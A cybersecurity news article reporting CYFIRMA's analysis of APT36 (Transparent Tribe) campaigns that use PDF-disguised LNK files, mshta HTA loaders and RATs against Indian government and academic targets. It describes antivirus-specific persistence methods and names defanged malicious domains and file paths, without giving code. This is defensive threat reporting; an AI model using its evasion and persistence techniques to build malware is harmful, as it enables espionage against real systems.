In a significant escalation of cyber warfare, the notorious state-sponsored threat actor, Transparent Tribe — also known as APT36 — has launched a fresh wave of sophisticated remote access trojan (RAT) attacks. These campaigns are meticulously designed to infiltrate and maintain persistent control over critical Indian governmental, academic, and strategic entities, underscoring a relentless focus on intelligence gathering.
Transparent Tribe’s Renewed Onslaught
Operating since at least 2013, Transparent Tribe has cemented its reputation as a formidable force in cyber espionage, primarily targeting Indian organizations. This adversary continually refines its arsenal, deploying an array of potent RATs such as CapraRAT, Crimson RAT, ElizaRAT, and DeskRAT, each capable of granting deep, persistent access to compromised systems. The latest offensive, detailed by cybersecurity firm CYFIRMA, highlights the group’s evolving tactics and unwavering determination.
Deceptive Delivery: The LNK File Trap
The initial vector for these attacks is a cunningly crafted spear-phishing email. Victims receive a ZIP archive containing a weaponized Windows shortcut (LNK) file. This LNK file is ingeniously disguised as a legitimate PDF document, even embedding full PDF content to completely disarm user suspicion.
Upon execution, the LNK file doesn’t directly unleash the RAT. Instead, it triggers a remote HTML Application (HTA) script via “mshta.exe.” This HTA script acts as a sophisticated loader, decrypting and injecting the final RAT payload directly into memory, thus minimizing its footprint on disk. Crucially, to further allay any suspicion, the HTA simultaneously downloads and opens the decoy PDF document, presenting a seemingly harmless interaction to the user.
CYFIRMA notes that this HTA leverages ActiveX objects, particularly
WScript.Shell, for environment profiling and runtime manipulation. This adaptive behavior ensures compatibility with the target system and enhances execution reliability – hallmarks of advanced malware exploiting mshta.exe.
Adaptive Persistence: Evading Detection
One of the most remarkable aspects of this new RAT campaign is its dynamic approach to establishing persistence. The malware intelligently adapts its methods based on the antivirus solutions detected on the infected machine:
- If Kaspersky is present: It creates a working directory, writes an obfuscated HTA payload to disk, and establishes persistence by dropping an LNK file in the Windows Startup folder, which then launches the HTA script.
- If Quick Heal is detected: Persistence is achieved by creating a batch file and a malicious LNK file in the Windows Startup folder, writing the HTA payload, and executing it via the batch script.
- If Avast, AVG, or Avira are found: The payload is directly copied into the Startup directory and executed.
- If no recognized antivirus is detected: The malware defaults to a combination of batch file execution, registry-based persistence, and payload deployment before launching the batch script.
This multi-faceted approach significantly increases the malware’s chances of maintaining a foothold, even against varying security postures.
The RAT’s Arsenal: Capabilities Unveiled
The second-stage HTA file ultimately deploys a powerful DLL, identified as “iinneldc.dll,” which functions as a full-featured remote access trojan. Its capabilities are extensive, enabling the attackers to:
- Exert remote control over the compromised system.
- Manage and manipulate files.
- Exfiltrate sensitive data.
- Capture screenshots.
- Manipulate the clipboard.
- Control running processes.
These functions grant Transparent Tribe comprehensive control, allowing for deep intelligence gathering and sustained espionage operations.
A Second Front: The NCERT Advisory Lure
In recent weeks, APT36 has also been linked to another distinct campaign. This one utilizes a malicious shortcut file disguised as a government advisory PDF (“NCERT-Whatsapp-Advisory.pdf.lnk”) to deliver a .NET-based loader. This loader, in turn, drops additional executables and malicious DLLs, facilitating remote command execution, system reconnaissance, and long-term access.
The shortcut executes an obfuscated command via cmd.exe to retrieve an MSI installer (“nikmights.msi”) from a remote server (aeroclubofindia.co[.]in). This installer orchestrates a series of actions:
- Extracts and displays a legitimate decoy PDF (a PKCERT advisory from 2024 regarding a fraudulent WhatsApp campaign).
- Decodes and writes DLL files (
pdf.dll,wininet.dll) toC:ProgramDataPcDirvs. - Drops and executes
PcDirvs.exeafter a 10-second delay. - Establishes persistence by creating
PcDirvs.htawith Visual Basic Script to modify the Registry, ensuringPcDirvs.exelaunches at every system startup.
While the associated command-and-control (C2) infrastructure (dns.wmiprovider[.]com) is currently inactive, the robust Windows Registry-based persistence mechanism ensures that this threat can be reactivated at any future time, posing a continuous dormant danger.
Persistent Threat, Evolving Tactics
CYFIRMA’s analysis underscores that APT36 (Transparent Tribe) remains a highly persistent and strategically driven cyber-espionage threat. Their sustained focus on intelligence collection targeting Indian government entities, educational institutions, and other strategically relevant sectors demands constant vigilance. The group’s continuous evolution of delivery techniques, payload capabilities, and adaptive persistence mechanisms highlights the sophisticated and enduring nature of this cyber threat. Organizations in India must remain proactive in their defense strategies to counter these advanced and persistent threats.
For more details, visit our website.
Source: Link
